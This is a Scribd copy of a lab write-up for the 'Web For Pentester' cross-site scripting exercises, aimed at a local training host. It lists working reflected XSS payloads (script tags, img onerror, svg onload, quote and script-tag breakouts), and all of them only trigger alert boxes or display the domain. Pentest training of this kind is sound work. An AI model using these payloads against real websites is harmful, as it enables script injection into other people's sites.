Scribd
Upload
109 views

XSS - Web For Pentester

The document discusses examples of cross-site scripting (XSS) vulnerabilities and payloads to exploit them. Various payloads are inserted into URLs to trigger alerts, inject HTML, and extract the domain. The examples cover different XSS contexts like reflected, stored, and DOM-based XSS. Later examples escape quotes and delimiters to craft payloads that work in different environments.

Uploaded by

joaolopesnetosemrif
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
109 views

XSS - Web For Pentester

The document discusses examples of cross-site scripting (XSS) vulnerabilities and payloads to exploit them. Various payloads are inserted into URLs to trigger alerts, inject HTML, and extract the domain. The examples cover different XSS contexts like reflected, stored, and DOM-based XSS. Later examples escape quotes and delimiters to craft payloads that work in different environments.

Uploaded by

joaolopesnetosemrif
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 22

XSS

Example 1:

URL: http://192.168.1.3/xss/example1.php?name=hacker

Alert:

URL: http://192.168.1.3/xss/example1.php?name=<script>alert(1)</script>

XSS 1
Getting the domian:

No cookies are used in the application so as a poc we will exfiltrate the document.domain :

Payload:

<img src=AAAAAAAAA onerror=alert(document.domain) />

URL: http://192.168.1.3/xss/example1.php?name=<img src=AAAAAAAAA


onerror=alert(document.domain) />

XSS 2
Example 2:

URL: http://192.168.1.3/xss/example2.php?name=hacker

HTML Injection:

URL: http://192.168.1.3/xss/example2.php?name=<b>alert(1)</b>

XSS 3
Alert:

Payload:

<SCRIPT>alert(1)</SCRIPT>

URL: http://192.168.1.3/xss/example2.php?name=<SCRIPT>alert(1)</SCRIPT>

Getting the domian:

No cookies are used in the application so as a poc we will exfiltrate the document.domain :

Payload:

XSS 4
<img src=AAAAAAAAA onerror=alert(document.domain) />

URL: http://192.168.1.3/xss/example2.php?name=<img src=AAAAAAAAA


onerror=alert(document.domain) />

Example 3:

URL: http://192.168.1.3/xss/example3.php?name=hacker

XSS 5
HTML Injection:

URL: http://192.168.1.3/xss/example3.php?name=<b>alert(1)</b>

Alert:

Payload:

<img src=AAAAAAAAA onerror=alert(1) />

XSS 6
Getting the Domain:

Payload:

<img src=AAAAAAAAA onerror=alert(document.domain) />

XSS 7
Example 4:

URL: http://192.168.1.3/xss/example4.php?name=hacker

I noticed that the payload:

<img src=AAAAAAAAA onerror=alert(document.domain) />

Always works, so I took a whitebox approach.

XSS 8
Payload:

<svg/onload=alert('1')>

XSS 9
Example 5:

URL: http://192.168.1.3/xss/example5.php?name=hacker

XSS 10
We will use script tags and an alert alternative.

Payload:

window.confirm('xss')

URL: http://192.168.1.3/xss/example5.php?name=<script>window.confirm('xss')
</script>

XSS 11
Example 6:

URL: http://192.168.1.3/xss/example6.php?name=hacker

XSS 12
XSS 13
Payload:

</script><script>alert(1)</script>

Example 7:

XSS 14
URL: http://192.168.1.3/xss/example7.php?name=hacker

We will escape the quotes and be in the context of JS:

Payload1:

http://192.168.1.3/xss/example7.php?name=';alert(1)

XSS 15
Payload2:

http://192.168.1.3/xss/example7.php?name=';alert(1)'

Payload3:

XSS 16
http://192.168.1.3/xss/example7.php?name=%27;alert(1);%27

Example 8:

URL: http://192.168.1.3/xss/example8.php

XSS 17
XSS 18
After some trial and error I ended up on ‘reflecting’ the payload

Payload:

"/><script>alert(1)</script>

in the URL.

XSS 19
Example 9:

URL: http://192.168.1.3/xss/example9.php#hacker

XSS 20
We have to perform a DOM-Based XSS.

For this we need an old/vulnerable browser.

We will use Windows 7 internet explorer.

XSS 21
XSS 22

You might also like